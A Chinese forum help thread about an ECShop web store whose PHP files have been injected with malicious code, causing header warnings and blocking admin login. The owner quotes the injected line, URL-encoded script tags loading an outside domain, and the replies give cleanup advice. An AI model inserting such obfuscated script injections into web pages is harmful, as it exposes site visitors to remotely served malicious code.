网站被挂马,请教如何处理。不能登录后台~

2016-07-07 15:03 来源:www.chinab4c.com 作者:ecshop专家

网站首页出现:
Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\cls_session.php on line 116
Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\init.php on line 162
Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\init.php on line 163
Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\cls_template.php on line 58
Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\lib_main.php on line 1090

网站后台登录不了。出现:

Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\cls_session.php on line 116

Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\data\config.php:29) in E:\wwwroot\ttsells\wwwroot\includes\cls_template.php on line 58
查看ftp上文件的修改日期是今天:
在文件的末尾有:<script src=http://%6E%6Ae%38.cn></script><script src=http://%6Ej%65%38%2Ecn></script>
请教如何处理。。十分谢谢~~

回答:
我在后台ftp上找有:<script src=http://%6E%6Ae%38.cn></script><script src=http://%6Ej%65%38%2Ecn></script>这个js的删除,重新传到ftp上,还是不行呢。。

你用的是utf-8的编码么?是的话,可能是自动加了bom签名,你用dw打开config.php页面,把bom签名去掉试试。

后台现在还显示:Warning: Cannot modify header information - headers already sent by (output started at E:\wwwroot\ttsells\wwwroot\languages\zh_cn\admin\index.php:205) in E:\wwwroot\ttsells\wwwroot\includes\cls_template.php on line 58
还是不能登录,
拜托指教一下。。

你用的是utf8版的吗?是的话,把有提示这个信息的页面里面bom签名去掉试试。

不是bom的问题,我的文件都是下载用dw打开的。
我发现很多文件都被加了js,我去掉之后可以访问 。但是过了1-2小时又被挂马了。。。。

像后面
E:\wwwroot\ttsells\wwwroot\includes\cls_session.php on line 116
这些文件用源文件覆盖下。

如果是程序和文件未更改过,那么把空间上的文件全部删除,(保存图片文件夹和data文件夹)然后上传最新文件。方法和搬家类似